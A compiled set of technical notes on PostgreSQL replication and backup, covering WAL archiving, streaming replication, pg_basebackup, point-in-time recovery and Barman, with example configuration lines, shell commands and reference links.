When the slave can't pull the WAL segment directly from the master, it will attempt to use the restore_command to load it. You can configure the slave to automatically remove segments using the archive_cleanup_command setting.

http://stackoverflow.com/questions/28201475/how-do-i-fix-a-postgresql-9-3-slave-that-cannot-keep-up-with-the-master
http://www.mkyong.com/database/postgresql-point-in-time-recovery-incremental-backup/
http://www.pgbarman.org/faq/

42.1.16 Binary Replication Tools https://wiki.postgresql.org/wiki/Binary_Replication_Tools


42.1.17 warm standby or log shipping

A standby server can also be used for read-only queries, in which case it is called a Hot Standby server.

http://www.postgresql.org/docs/current/interactive/warm-standby.html
https://wiki.postgresql.org/wiki/Hot_Standby
https://momjian.us/main/writings/pgsql/hot_streaming_rep.pdf

It should be noted that log shipping is asynchronous, i.e., the WAL records are shipped after transaction commit. As a result, there is a window for data loss should the primary server suffer a catastrophic failure; transactions not yet shipped will be lost. The size of the data loss window in file-based log shipping can be limited by use of the archive_timeout parameter, which can be set as low as a few seconds. However such a low setting will substantially increase the bandwidth required for file shipping. Streaming replication (see Section 25.2.5) allows a much smaller window of data loss.

42.1.18 Streaming Replication

Log-Shipping Standby Servers. Streaming replication allows a standby server to stay more up-to-date than is possible with file-based log shipping. The standby connects to the primary, which streams WAL records to the standby as they’re generated, without waiting for the WAL file to be filled.

Streaming replication is asynchronous by default, in which case there is a small delay between committing a transaction in the primary and the changes becoming visible in the standby. This delay is however much smaller than with file-based log shipping, typically under one second assuming the standby is powerful enough to keep up with the load. With streaming replication, archive_timeout is not required to reduce the data loss window.

If you use streaming replication without file-based continuous archiving, the server might recycle old WAL segments before the standby has received them. If this occurs, the standby will need to be reinitialized from a new base backup. You can avoid this by setting wal_keep_segments to a value large enough to ensure that WAL segments are not recycled too early, or by configuring a replication slot for the standby. If you set up a WAL archive that’s accessible from the standby, these solutions are not required, since the standby can always use the archive to catch up provided it retains enough segments.

To use streaming replication, set up a file-based log-shipping standby server as described in Section 25.2. The step that turns a file-based log-shipping standby into a streaming replication standby is setting the primary_conninfo setting in the recovery.conf file to point to the primary server. Set listen_addresses and authentication options (see pg_hba.conf) on the primary so that the standby server can connect to the replication pseudo-database on the primary server.

http://www.postgresql.org/docs/current/interactive/warm-standby.html#STREAMING-REPLICATION
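To make this concrete, a minimal sketch of the pieces mentioned above (host, user and network values are made up for illustration):

# postgresql.conf on the primary
listen_addresses = '*'
wal_level = hot_standby
max_wal_senders = 3

# pg_hba.conf on the primary -- let the standby connect to the replication pseudo-database
host    replication    repuser    192.168.0.0/24    md5

# recovery.conf on the standby
standby_mode = 'on'
primary_conninfo = 'host=192.168.0.10 port=5432 user=repuser'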

42.1.19 Introduction to Binary Replication

Binary replication is also called “Hot Standby” and “Streaming Replication”, which are two separate, but complementary, features of PostgreSQL 9.0 and later. Here’s some general information about how they work and what they are for.

42.1.20 PITR

In Point-In-Time Recovery (PITR), transaction logs are copied and saved to storage until needed. Then, when needed, the Standby server can be “brought up” (made active) and transaction logs applied, either stopping when they run out or at a prior point indicated by the administrator. PITR has been available since PostgreSQL version 8.0, and as such will not be documented here. PITR is primarily used for database forensics and recovery. It is also useful when you need to back up a very large database, as it effectively supports incremental backups, which pg_dump does not.

42.1.21 Warm Standby

In Warm Standby, transaction logs are copied from the Master and applied to the Standby immediately after they are received, or at a short delay. The Standby is offline (in “recovery mode”) and not available for any query workload. This allows the Standby to be brought up to full operation very quickly. Warm Standby has been available since version 8.3, and will not be fully documented here. Warm Standby requires Log Shipping. It is primarily used for database failover.

42.1.22 Hot Standby

Hot Standby is identical to Warm Standby, except that the Standby is available to run read-only queries. This offers all of the advantages of Warm Standby, plus the ability to distribute some business workload to the Standby server(s). Hot Standby by itself requires Log Shipping. Hot Standby is used both for database failover, and can also be used for load-balancing. In contrast to Streaming Replication, it places no load on the master (except for disk space requirements) and is thus theoretically infinitely scalable. A WAL archive could be distributed to dozens or hundreds of servers via network storage. The WAL files could also easily be copied over a poor quality network connection, or by SFTP. However, since Hot Standby replicates by shipping 16MB logs, it is at best minutes behind and sometimes more than that. This can be problematic both from a failover and a load-balancing perspective.

42.1.23 Streaming Replication

Streaming Replication improves either Warm Standby or Hot Standby by opening a network connection between the Standby and the Master database, instead of copying 16MB log files. This allows data changes to be copied over the network almost immediately on completion on the Master.

In Streaming Replication, the master and the standby have special processes called the walsender and walreceiver which transmit modified data pages over a network port. This requires one fairly busy connection per standby, imposing an incremental load on the master for each additional standby. Still, the load is quite low and a single master should be able to support multiple standbys easily.

Streaming replication does not require log shipping in normal operation. It may, however, require log shipping to start replication, and can utilize log shipping in order to catch up standbys which fall behind.

https://wiki.postgresql.org/wiki/Binary_Replication_Tutorial#5_Minutes_to_Simple_Replication

42.1.24 Safe way to check for PostgreSQL replication delay/lag

http://www.postgresql.org/message-id/CADKbJJWz9M0swPT3oqe8f9+tfD4-F54uE6Xtkh4nERpVsQnjnw@mail.gmail.com
http://blog.2ndquadrant.com/monitoring-wal-archiving-improves-postgresql-9-4-pg_stat_archiver/
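In practice the checks suggested there boil down to a couple of queries; a quick sketch (both exist since PostgreSQL 9.1, and the exact columns of pg_stat_replication vary by version):

-- on the standby: approximate replication delay
SELECT now() - pg_last_xact_replay_timestamp() AS replication_delay;

-- on the master: one row per connected standby, with sent/replayed WAL positions
SELECT * FROM pg_stat_replication;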


42.1.25 Does PostgreSQL 9.1 Streaming Replication catch up after a lag without WAL archiving?

http://dba.stackexchange.com/q/10540
http://dba.stackexchange.com/questions/100633/postgres-streaming-replication-how-to-re-sync-data-in-master-with-standby-aft#
http://dba.stackexchange.com/questions/90896/recovery-when-failover
http://www.postgresql.org/docs/9.2/static/pgstandby.html
http://blog.2ndquadrant.com/getting-wal-files-from-barman-with-get-wal/
http://blog.2ndquadrant.com/configuring-retention-policies-in-barman/

42.1.26 archive_command

When the archive_command fails, it will repeatedly retry until it succeeds. PostgreSQL does not remove WAL files from pg_xlog until the WAL files have been successfully archived, so the end result is that your pg_xlog directory fills up. It’s a good idea to have an archive_command that reacts better to that condition, though that is left as an improvement for the sysadmin. Typical action is to make that an emergency call out so we can resolve the problem manually. Automatic resolution is difficult to get right as this condition is one for which it is hard to test. http://www.postgresql.org/docs/9.0/static/runtime-config-wal.html#GUC-ARCHIVE-COMMAND The archive_command is only invoked for completed WAL segments.

archive_command = 'test ! -f /mnt/server/archivedir/%f && cp %p /mnt/server/archivedir/%f'  # Unix

test ! -f /mnt/server/archivedir/00000001000000A900000065 && cp pg_xlog/00000001000000A900000065 /mnt/server/archivedir/00000001000000A900000065

It is important that the archive command return zero exit status if and only if it succeeds. Upon getting a zero result, PostgreSQL will assume that the file has been successfully archived, and will remove or recycle it. However, a nonzero status tells PostgreSQL that the file was not archived; it will try again periodically until it succeeds.

The archive command is only invoked on completed WAL segments. Hence, if your server generates only little WAL traffic (or has slack periods where it does so), there could be a long delay between the completion of a transaction and its safe recording in archive storage. To put a limit on how old unarchived data can be, you can set archive_timeout to force the server to switch to a new WAL segment file at least that often. Note that archived files that are archived early due to a forced switch are still the same length as completely full files. It is therefore unwise to set a very short archive_timeout, as it will bloat your archive storage. archive_timeout settings of a minute or so are usually reasonable.

Also, you can force a segment switch manually with pg_switch_xlog if you want to ensure that a just-finished transaction is archived as soon as possible.
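As a quick sketch of both knobs: set archive_timeout in postgresql.conf (for example archive_timeout = 60), and force an immediate switch from psql when needed (on PostgreSQL 10 and later the function was renamed to pg_switch_wal()):

-- force the current WAL segment to be completed and handed to archive_command
SELECT pg_switch_xlog();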

42.1.27 base backup

In each base backup you will find a file called backup_label. The earliest WAL file required by a physical backup is the filename mentioned on the first line of the backup_label file. We can use a contrib module called pg_archivecleanup to remove any WAL files earlier than the earliest file. http://www.postgresql.org/docs/9.1/static/continuous-archiving.html
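A usage sketch: pg_archivecleanup takes the archive directory and the oldest WAL file that must be kept, which in practice is the file named on the first line of backup_label (the file name below is made up):

$ pg_archivecleanup /mnt/server/archivedir 000000010000000000000010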


42.1.28 pg_basebackup

pg_basebackup -d 'connection string' -D /path/to_data_dir

For PostgreSQL 9.2 and later versions, you are advised to use the following additional option on the pg_basebackup command line. This option allows the required WAL files to be streamed alongside the base backup on a second session, greatly improving the startup time on larger databases, without the need to fuss over large settings of wal_keep_segments (as seen in step 6 of the previous procedure):

--xlog-method=stream

For PostgreSQL 9.4 and later versions, if the backup uses too many server resources (CPU, memory, disk, or bandwidth), you can throttle down the speed for the backup using the following additional option on the pg_basebackup command line. The RATE value is specified in kB/s by default:

--max-rate=RATE

https://opensourcedbms.com/dbms/point-in-time-recovery-pitr-using-pg_basebackup-with-postgresql-9-2/
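Putting the options together, a sketch of a throttled, streaming base backup (host, user, path and rate are only examples):

$ pg_basebackup -d 'host=192.168.0.10 user=repuser' -D /var/lib/postgresql/9.x/backup \
      --xlog-method=stream --max-rate=32768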

42.1.29 base backup

In order for the standby to start replicating, the entire database needs to be archived and then reloaded into the standby. This process is called a “base backup”, and can be performed on the master and then transferred to the slave. Let’s create a snapshot to transfer to the slave by capturing a binary backup of the entire PostgreSQL data directory.

su - postgres
psql -c "SELECT pg_start_backup('backup', true)"
rsync -av --exclude postmaster.pid --exclude pg_xlog /var/lib/postgresql/9.1/main/ [email protected]:/var/lib/postgresql/9.1/main/
psql -c "SELECT pg_stop_backup()"

http://blog.codepath.com/2012/02/13/adventures-in-scaling-part-3-postgresql-streaming-replication/

42.1.30 Postgres replica and docker https://gist.github.com/mattupstate/c6a99f7e03eff86f170e

42.1.31 Backup Control Functions

http://www.postgresql.org/docs/9.4/static/functions-admin.html

pg_switch_xlog(): Force switch to a new transaction log file (restricted to superusers)

42.1.32 PostgreSQL Streaming Replication

http://blog.codepath.com/2012/02/13/adventures-in-scaling-part-3-postgresql-streaming-replication/
http://dba.stackexchange.com/questions/30609/postgresql-can-i-do-pg-start-backup-on-a-live-running-db-under-load


42.1.33 pg_basebackup vs pg_start_backup

PostgreSQL supports a Write Ahead Log (WAL) mechanism like Oracle. So everything will be written to (redo) logs before it is written into the actual datafiles. So we will use a similar method to Oracle: we need to start “backup mode”, copy the (data) files, stop the backup mode, and add the archived logs to our backup. There are SQL commands for starting backup mode (pg_start_backup) and for stopping backup mode (pg_stop_backup), and we can copy the files using OS commands. The good thing is, since 9.1, PostgreSQL comes with a backup tool named “pg_basebackup”. It’ll do everything for us.

http://www.gokhanatil.com/2014/12/how-to-backup-and-restore-postgresql-9-3-databases.html

42.1.34 Example of Standalone Hot Backups and recovery

To prepare for standalone hot backups, set wal_level to archive (or hot_standby), archive_mode to on, and set up an archive_command that performs archiving only when a switch file exists.

$ vim postgresql.conf

wal_level = hot_standby
archive_mode = on
archive_command = 'test ! -f /var/lib/postgresql/9.x/backup_in_progress || (test ! -f /var/lib/postgresql/9.x/archive/%f && cp %p /var/lib/postgresql/9.x/archive/%f)'

This command will perform archiving when /var/lib/postgresql/9.x/backup_in_progress exists, and otherwise silently return zero exit status (allowing PostgreSQL to recycle the unwanted WAL file). With this preparation, a backup can be taken using a script like the following:

touch /var/lib/postgresql/9.x/backup_in_progress
psql -c "select pg_start_backup('hot_backup');" -U postgres
tar -cf /var/lib/postgresql/9.x/backup.tar /var/lib/postgresql/9.x/main/
psql -c "select pg_stop_backup();" -U postgres
rm /var/lib/postgresql/9.x/backup_in_progress
tar -rf /var/lib/postgresql/9.x/backup.tar /var/lib/postgresql/9.x/archive/

The switch file /var/lib/postgresql/9.x/backup_in_progress is created first, enabling archiving of completed WAL files to occur. After the backup the switch file is removed. Archived WAL files are then added to the backup so that both the base backup and all required WAL files are part of the same tar file. Please remember to add error handling to your backup scripts. Note that if only wal_level=hot_standby is set in postgresql.conf, we get this warning after running the pg_stop_backup command:

root@51b1a7d96fbb:/# psql -c "select pg_stop_backup();" -U postgres
NOTICE: WAL archiving is not enabled; you must ensure that all required WAL segments are copied through other means to complete the backup
 pg_stop_backup
----------------
 0/20046E8
(1 row)

And if only wal_level=hot_standby and archive_mode=on are set in postgresql.conf, we get this warning after running the pg_stop_backup command:

root@51b1a7d96fbb:/# psql -c "select pg_stop_backup();" -U postgres
NOTICE: pg_stop_backup cleanup done, waiting for required WAL segments to be archived
WARNING: pg_stop_backup still waiting for all required WAL segments to be archived (60 seconds elapsed)
HINT: Check that your archive_command is executing properly. pg_stop_backup can be canceled safely, but the database backup will not be usable without all the WAL segments.

Recover data

Now that the base backup is restored, you must tell PostgreSQL how to apply the recovery procedure. First, create a file called recovery.conf in the data directory, /var/lib/postgresql/9.x/main/recovery.conf. The contents should minimally include the following line, adjusted to the location of the WAL files.

$ sudo service postgresql stop
$ sudo mv /var/lib/postgresql/9.x/main /var/lib/postgresql/9.x/_main
$ sudo mkdir /var/lib/postgresql/9.x/restore
$ sudo tar -xvf /var/lib/postgresql/9.x/backup.tar -C /var/lib/postgresql/9.x/restore
$ sudo mv /var/lib/postgresql/9.x/restore/var/lib/postgresql/9.x/main/ /var/lib/postgresql/9.x/main
$ sudo vim /var/lib/postgresql/9.x/main/recovery.conf
restore_command = 'cp /var/lib/postgresql/9.x/archive/%f %p'
$ sudo chown -R postgres:postgres /var/lib/postgresql/9.x/main
$ sudo chown -R postgres:postgres /var/lib/postgresql/9.x/archive
$ sudo service postgresql restart
$ sudo tail -f /var/log/postgresql/postgresql-9.x-main.log

https://www.zetetic.net/blog/2012/3/9/point-in-time-recovery-from-backup-using-postgresql-continuo.html
https://www.zetetic.net/blog/2011/2/1/postgresql-on-ebs-moving-to-aws-part-3.html
http://www.mkyong.com/database/postgresql-point-in-time-recovery-incremental-backup/
http://www.postgresql.org/docs/9.4/static/continuous-archiving.html

42.1.35 Backup with pg_basebackup

The backup is made over a regular PostgreSQL connection, and uses the replication protocol. The connection must be made with a superuser or a user having REPLICATION permissions, and pg_hba.conf must explicitly permit the replication connection. The server must also be configured with max_wal_senders set high enough to leave at least one session available for the backup.

$ sudo vim /etc/postgresql/9.x/main/postgresql.conf
max_wal_senders = 1
$ sudo vim /etc/postgresql/9.5/main/pg_hba.conf
local replication postgres trust
$ sudo service postgresql restart
$ sudo pg_basebackup --xlog --format=t -D /var/lib/postgresql/9.x/backup/`date +%Y%m%d` -U postgres

http://www.gokhanatil.com/2014/12/how-to-backup-and-restore-postgresql-9-3-databases.html
https://opensourcedbms.com/dbms/point-in-time-recovery-pitr-using-pg_basebackup-with-postgresql-9-2/
http://www.postgresql.org/docs/9.4/static/app-pgbasebackup.html


42.1.36 Find Postgresql Version

$ sudo psql -c 'SELECT version()' -U postgres

42.1.37 Barman

# On The Master SERVER
$ sudo apt-get install rsync
$ vim /etc/postgresql/9.x/main/postgresql.conf
wal_level = hot_standby
archive_mode = on
archive_command = 'rsync -a %p barman@:/var/lib/barman/main/wals/%f'

# On The BACKUP SERVER
$ sudo su - barman
$ vim ~/.ssh/authorized_keys   # add public key

# On The Master SERVER
$ vim ~/.ssh/authorized_keys   # add public key

$ vim /etc/barman.conf
[main]
description = "Main PostgreSQL Database"
ssh_command = ssh root@
conninfo = host= user=postgres

$ barman check main

Server main:
    PostgreSQL: OK
    archive_mode: OK
    wal_level: OK
    archive_command: OK
    continuous archiving: OK
    directories: OK
    retention policy settings: OK
    backup maximum age: OK (no last_backup_maximum_age provided)
    compression settings: OK
    minimum redundancy requirements: OK (have 0 backups, expected at least 0)
    ssh: OK (PostgreSQL server)
    not in recovery: OK

https://sourceforge.net/projects/pgbarman/files/1.6.0/
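Once barman check main passes, the day-to-day commands are roughly the following (a sketch; the recovery destination path is made up):

$ barman backup main                                              # take a new base backup of the "main" server
$ barman list-backup main                                         # list available backups
$ barman recover main latest /var/lib/postgresql/9.x/recovered    # restore the newest backup to a directory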

42.1.38 pg_receivexlog

$ pg_receivexlog -D /var/lib/postgresql/9.5/backup/rxlog -U postgres

http://www.postgresql.org/docs/9.4/static/app-pgreceivexlog.html

pg_receivexlog is used to stream transaction log from a running PostgreSQL cluster.


The transaction log is streamed using the streaming replication protocol, and is written to a local directory of files. This directory can be used as the archive location for doing a restore using point-in-time recovery. pg_receivexlog streams the transaction log in real time as it’s being generated on the server, and does not wait for segments to complete like archive_command does. For this reason, it is not necessary to set archive_timeout when using pg_receivexlog. The transaction log is streamed over a regular PostgreSQL connection, and uses the replication protocol. The connection must be made with a superuser or a user having REPLICATION permissions, and pg_hba.conf must explicitly permit the replication connection. The server must also be configured with max_wal_senders set high enough to leave at least one session available for the stream. If the connection is lost, or if it cannot be initially established, with a non-fatal error, pg_receivexlog will retry the connection indefinitely, and reestablish streaming as soon as possible. To avoid this behavior, use the -n parameter.

42.1.39 what are the pg_clog and pg_xlog directories ?

The pg_xlog contains Postgres Write Ahead Logs (WAL, Postgres implementation of transaction logging) files (normally 16MB in size, each). The pg_clog contains the commit log files which contain transaction commit status of a transaction. One main purpose is to perform a database recovery in case of a crash by replaying these logs.

42.1.40 Getting WAL files from Barman with ‘get-wal’

Barman 1.5.0 enhances the robustness and business continuity capabilities of PostgreSQL clusters, integrating the get-wal command with any standby server’s restore_command. Barman currently supports only WAL shipping from the master using archive_command (Postgres 9.5 will allow users to ship WAL files from standby servers too through “archive_mode = always” and we’ll be thinking of something for the next Barman release). However, very frequently we see users that prefer to ship WAL files from Postgres to multiple locations, such as one or more standby servers or another file storage destination.

In these cases, the logic of these archive command scripts can easily become quite complex and, in the long term, dangerously slip through your grasp (especially if PostgreSQL and its operating system are not under strict monitoring). With 1.5.0 you can even integrate Barman with a standby server’s restore_command, adding a fallback method to streaming replication synchronisation, to be used in case of temporary (or not) network issues with the source of the stream (be it a master or another standby). All you have to do is add this line in the standby’s recovery.conf file:

# Change 'SERVER' with the actual ID of the server in Barman
restore_command = 'ssh barman@pgbackup barman get-wal SERVER %f > %p'


http://blog.2ndquadrant.com/getting-wal-files-from-barman-with-get-wal/

42.1.41 verifying data consistency between two postgresql databases http://stackoverflow.com/questions/16550013/verifying-data-consistency-between-two-postgresql-databases

42.1.42 How to check the replication delay in PostgreSQL? http://stackoverflow.com/questions/28323355/how-to-check-the-replication-delay-in-postgresql

42.1.43 Streaming replication slots in PostgreSQL 9.4 http://blog.2ndquadrant.com/postgresql-9-4-slots/

42.1.44 Continuous Archiving and Point-in-Time Recovery (PITR)

http://www.postgresql.org/docs/9.4/static/continuous-archiving.html

In order to restore a backup, you need to have the base archive of all the data files, plus a sequence of xlogs. An “incremental backup” can be made, of just some more xlogs in the sequence. Note that if you have any missing xlogs, then recovery will stop early.
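A minimal recovery.conf sketch for recovering to a specific moment, assuming the WAL archive lives in /path_to/archive (the target timestamp is only an example):

restore_command = 'cp /path_to/archive/%f %p'
recovery_target_time = '2019-10-01 12:00:00'

Without recovery_target_time, recovery simply replays all available xlogs to the end.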

42.1.45 Point In Time Recovery From Backup using PostgreSQL Continuous Archiving

https://www.zetetic.net/blog/2012/3/9/point-in-time-recovery-from-backup-using-postgresql-continuo.html


After a transaction commits on the master, the time taken to transfer data changes to a remote node is usually referred to as the latency, or replication delay. Once the remote node has received the data, changes must then be applied to the remote node, which takes an amount of time known as the apply delay. The total time a record takes from the master to a downstream node is the replication delay plus the apply delay.

42.1.46 Purpose of archiving in master?

WAL archiving is useful when you’re running streaming replication, because there’s a limit to how much WAL the master will retain. If you don’t archive WAL, and the replica gets so far behind that the master has discarded WAL it still needs, it cannot recover and must be replaced with a fresh base backup from the master. It’s also useful for PITR for disaster recovery purposes.

42.1.47 Setting up file-based replication - deprecated

1. Identify your archive location and ensure that it has sufficient space. This recipe assumes that the archive is a directory on the standby node, identified by the $PGARCHIVE environment variable. This is set on both the master and standby nodes, as the master must write to the archive and the standby must read from it. The standby node is identified on the master using $STANDBYNODE.

2. Configure replication security. Perform a key exchange to allow the master and the standby to run the rsync command in either direction.

3. Adjust the master’s parameters in postgresql.conf, as follows:

wal_level = 'archive'
archive_mode = on
archive_command = 'scp %p $STANDBYNODE:$PGARCHIVE/%f'
archive_timeout = 30

4. Adjust Hot Standby parameters if required (see the Hot Standby and read scalability recipe).

5. Take a base backup, very similar to the process for taking a physical backup described in Chapter 11, Backup and Recovery.

6. Start the backup by running the following command:

psql -c "select pg_start_backup('base backup for log shipping')"

7. Copy the data files (excluding the pg_xlog directory). Note that this requires some security configuration to ensure that rsync can be executed without needing to provide a password when it executes. If you skipped step 2, do this now, as follows:

rsync -cva --inplace --exclude=*pg_xlog* \
    ${PGDATA}/ $STANDBYNODE:$PGDATA

8. Stop the backup by running the following command:

psql -c "select pg_stop_backup(), current_timestamp"

9. Set the recovery.conf parameters in the data directory on the standby server, as follows:


standby_mode = 'on'
restore_command = 'cp $PGARCHIVE/%f %p'
archive_cleanup_command = 'pg_archivecleanup $PGARCHIVE %r'
trigger_file = '/tmp/postgresql.trigger.5432'

10. Start the standby server.

11. Carefully monitor the replication delay until the catch-up period is over. During the initial catch-up period, the replication delay will be much higher than we would normally expect it to be. You are advised to set hot_standby to off for the initial period only.

Transaction log (WAL) files will be written on the master. Setting wal_level to archive ensures that we collect all of the changed data, and that WAL is never optimized away. WAL is sent from the master to the archive using archive_command, and from there, the standby reads WAL files using restore_command. Then, it replays the changes.

The archive_command is executed when a file becomes full, or an archive_timeout number of seconds have passed since any user inserted change data into the transaction log. If the server does not write any new transaction log data for an extended period, then files will switch every checkpoint_timeout seconds. This is normal, and not a problem.

The preceding configuration assumes that the archive is on the standby, so the restore_command shown is a simple copy command (cp). If the archive was on a third system, then we would need to either mount the filesystem remotely or use a network copy command.

The archive_cleanup_command ensures that the archive only holds the files that the standby needs for restarting, in case it stops for any reason. Files older than the last file required are deleted regularly to ensure that the archive does not overflow. Note that if the standby is down for an extended period, then the number of files in the archive will continue to accumulate, and eventually they will overflow. The number of files in the archive should also be monitored.

In the configuration shown in this recipe, a contrib module named pg_archivecleanup is used to remove files from the archive. This is a module supplied with PostgreSQL 9.0. The pg_archivecleanup module is designed to work with one standby node at a time. Note that pg_archivecleanup requires two parameters: the archive directory and %r, with a space between them. PostgreSQL transforms %r into the cut-off filename.

42.1.48 Setting up streaming replication

Log shipping is a replication technique used by many database management systems. The master records change in its transaction log (WAL), and then the log data is shipped from the master to the standby, where the log is replayed. In PostgreSQL, streaming replication transfers WAL data directly from the master to the standby, giving us integrated security and reduced replication delay. There are two main ways to set up streaming replication: with or without an additional archive.

1. Identify your master and standby nodes, and ensure that they have been configured according to the Replication best practices recipe.

2. Configure replication security. Create or confirm the existence of the replication user on the master node:

CREATE USER repuser SUPERUSER LOGIN CONNECTION LIMIT 1 ENCRYPTED PASSWORD 'changeme';

3. Allow the replication user to authenticate. The following example allows access from any IP address using MD5- encrypted password authentication; you may wish to consider other options. Add the following line to pg_hba.conf :


host replication repuser 127.0.0.1/0 md5

4. Set the logging options in postgresql.conf on both the master and the standby so that you can get more information regarding replication connection attempts and associated failures:

log_connections= on

5. Set max_wal_senders on the master in postgresql.conf , or increase it if the value is already nonzero:

max_wal_senders = 2
wal_level = 'archive'
archive_mode = on

6. Adjust wal_keep_segments on the master in postgresql.conf . Set this to a value no higher than the amount of free space on the drive on which the pg_xlog directory is mounted, divided by 16 MB. If pg_xlog isn’t mounted on a separate drive, then don’t assume that all of the current free space is available for transaction log files.

wal_keep_segments= 10000 # e.g. 160 GB

7. Adjust the Hot Standby parameters if required.

8. Take a base backup, very similar to the process for taking a physical backup:

1. Start the backup:

psql -c "select pg_start_backup('base backup for streaming rep')"

2. Copy the data files (excluding the pg_xlog directory):

rsync -cva --inplace --exclude=*pg_xlog* \
    ${PGDATA}/ $STANDBYNODE:$PGDATA

3. Stop the backup:

psql -c "select pg_stop_backup(), current_timestamp"

9. Set the recovery.conf parameters on the standby. Note that primary_conninfo must not specify a database name, though it can contain any other PostgreSQL connection option. Note also that all options in recovery.conf are enclosed in quotes, whereas the postgresql.conf parameters need not be:

standby_mode = 'on'
primary_conninfo = 'host=alpha user=repuser'
trigger_file = '/tmp/postgresql.trigger.5432'

10. Start the standby server.

11. Carefully monitor the replication delay until the catch-up period is over. During the initial catch-up period, the replication delay will be much higher than we would normally expect it to be.

Use pg_basebackup

Here is the alternative procedure, which works with PostgreSQL 9.1 using a tool called pg_basebackup. From PostgreSQL 9.2 onwards, you can run this procedure on a standby node rather than the master:

1. First, perform steps 1 to 5 of the preceding procedure.

2. Use wal_keep_segments, as shown in step 6 of the previous procedure, or in PostgreSQL 9.4 or later, use Replication Slots (see later recipe).


3. Adjust the Hot Standby parameters if required (see later recipe).

4. Take a base backup:

pg_basebackup -d 'connection string' -D /path/to_data_dir

For PostgreSQL 9.2 and later versions, you are advised to use the following additional option on the pg_basebackup command line. This option allows the required WAL files to be streamed alongside the base backup on a second session, greatly improving the startup time on larger databases, without the need to fuss over large settings of wal_keep_segments (as seen in step 6 of the previous procedure):

--xlog-method=stream

For PostgreSQL 9.4 and later versions, if the backup uses too many server resources (CPU, memory, disk, or bandwidth), you can throttle down the speed for the backup using the following additional option on the pg_basebackup command line. The RATE value is specified in kB/s by default:

--max-rate=RATE

5. Set the recovery.conf parameters on the standby. Note that primary_conninfo must not specify a database name, though it can contain any other PostgreSQL connection option. Note also that all options in recovery.conf are enclosed in quotes, whereas the postgresql.conf parameters need not be. For PostgreSQL 9.4 and later versions, you can skip this step if you wish by specifying the --write-recovery-conf option on pg_basebackup:

standby_mode = 'on'
primary_conninfo = 'host=192.168.0.1 user=repuser'
# trigger_file = ''   # no need for trigger file 9.1+

6. Start the standby server.

7. Carefully monitor the replication delay until the catch-up period is over. During the initial catch-up period, the replication delay will be much higher than we would normally expect it to be.

The pg_basebackup utility also allows you to produce a compressed tar file, using this command:

pg_basebackup -Ft -z

Multiple standby nodes can connect to a single master. Set max_wal_senders to the number of standby nodes, plus at least one. If you are planning to use pg_basebackup --xlog-method=stream, then allow for an additional connection per concurrent backup you plan for. You may wish to set up an individual user for each standby node, though it may be sufficient just to set the application_name parameter in primary_conninfo.

The architecture for streaming replication is this: on the master, one WALSender process is created for each standby that connects for streaming replication. On the standby node, a WALReceiver process is created to work cooperatively with the master. Data transfer has been designed and measured to be very efficient; data is typically sent in 8,192-byte chunks, without additional buffering at the network layer.

Both WALSender and WALReceiver will work continuously on any outstanding data to be replicated until the queue is empty. If there is a quiet period, then WALReceiver will sleep for 100 ms at a time, and WALSender will sleep for wal_sender_delay. Typically, the value of wal_sender_delay need not be altered because it only affects the behavior during momentary quiet periods. The default value is a good balance between efficiency and data protection.


If the master and standby are connected by a low-bandwidth network and the write rate on the master is high, you may wish to lower this value to perhaps 20 ms or 50 ms. Reducing this value will reduce the amount of data loss if the master becomes permanently unavailable, but will also marginally increase the cost of streaming the transaction log data to the standby.

The standby connects to the master using native PostgreSQL libpq connections. This means that all forms of authentication and security work for replication just as they do for normal connections. Note that, for replication sessions, the standby is the “client” and the master is the “server”, if any parameters need to be configured. Using standard PostgreSQL libpq connections also means that normal network port numbers are used, so no additional firewall rules are required. You should also note that if the connections use SSL, then encryption costs will slightly increase the replication delay and the CPU resources required.

If the connection between the master and standby drops, it will take some time for that to be noticed across an indirect network. To ensure that a dropped connection is noticed as soon as possible, you may wish to adjust the timeout settings. If you want a standby to notice that the connection to the master has dropped, you need to set the wal_receiver_timeout value in the postgresql.conf file on the standby. If you want the master to notice that a streaming standby connection has dropped, you can set the wal_sender_timeout parameter in the postgresql.conf file on the master. You may also wish to increase max_wal_senders to one or two more than the current number of nodes so that it will be possible to reconnect even before a dropped connection is noted. This allows a manual restart to re-establish connections more easily. If you do this, then also increase the connection limit for the replication user. Changing that setting requires a restart.

Data transfer may stop if the connection drops or the standby server or the standby system is shut down. If replication data transfer stops for any reason, it will attempt to restart from the point of the last transfer. Will that data still be available? Let’s see. For streaming replication, the master keeps a number of files that is at least equal to wal_keep_segments. If the standby database server has been down for long enough, the master will have moved on and will no longer have the data for the last point of transfer. If that should occur, then the standby needs to be reconfigured using the same procedure with which we started.

For PostgreSQL 9.2 and later versions, you should plan to use pg_basebackup --xlog-method=stream. If you choose not to, you should note that the standby database server will not be streaming during the initial base backup. So, if the base backup is long enough, we might end up with a situation where replication will never start because the desired starting point is no longer available on the master. This is the error that you’ll get:

FATAL: requested WAL segment 000000010000000000000002 has already been removed

It’s very annoying, and there’s no way out of it; you need to start over. So, start with a very high value of wal_keep_segments. Don’t guess this randomly; set it to the available disk space on pg_xlog divided by 16 MB, or less if it is a shared disk. If you still get that error, then you need to increase wal_keep_segments and try again.

If you can’t set wal_keep_segments high enough, there is an alternative. You must configure a third server or storage pool with increased disk storage capacity, which you can use as an archive. The master will need to have an archive_command that places files on the archive server, rather than the dummy command shown in the preceding procedure, in addition to parameter settings to allow streaming to take place. The standby will need to retrieve files from the archive using restore_command, as well as streaming using primary_conninfo. Thus, both the master and standby have two modes for sending and receiving, and they can switch between them should failures occur. This is the typical configuration for large databases. Note that this means that the WAL data will be copied twice, once to the archive and once directly to the standby. Two copies are more expensive, but also more robust.

The reason for setting archive_mode = on in the preceding procedure is that altering that parameter requires a restart, so you may as well set it on just in case you need it later. All we need to do is use a dummy archive_command to ensure that everything still works OK. By “dummy command”, I mean a command that will do nothing and then provide a return code of zero, for example, cd or true. One thing that is a possibility is to set archive_command only until the end of the catch-up period. After that, you can reset it to a dummy value and then continue with only streaming replication.

Data is transferred from the master to the standby only once it has been written (or more precisely, fsynced) to the disk. So, setting synchronous_commit = off will not improve the replication delay, even if it improves performance on the master. Once WAL data is received by the standby, the WAL data is fsynced to disk on the standby to ensure that it is not lost when the standby system restarts.
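A small sketch of the timeout parameters mentioned above, assuming PostgreSQL 9.3 or later where they exist under these names (values are illustrative):

# postgresql.conf on the standby
wal_receiver_timeout = 30s   # notice a dead connection to the master sooner

# postgresql.conf on the master
wal_sender_timeout = 30s     # notice a dead standby connection sooner
max_wal_senders = 4          # a little headroom so reconnects are possible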

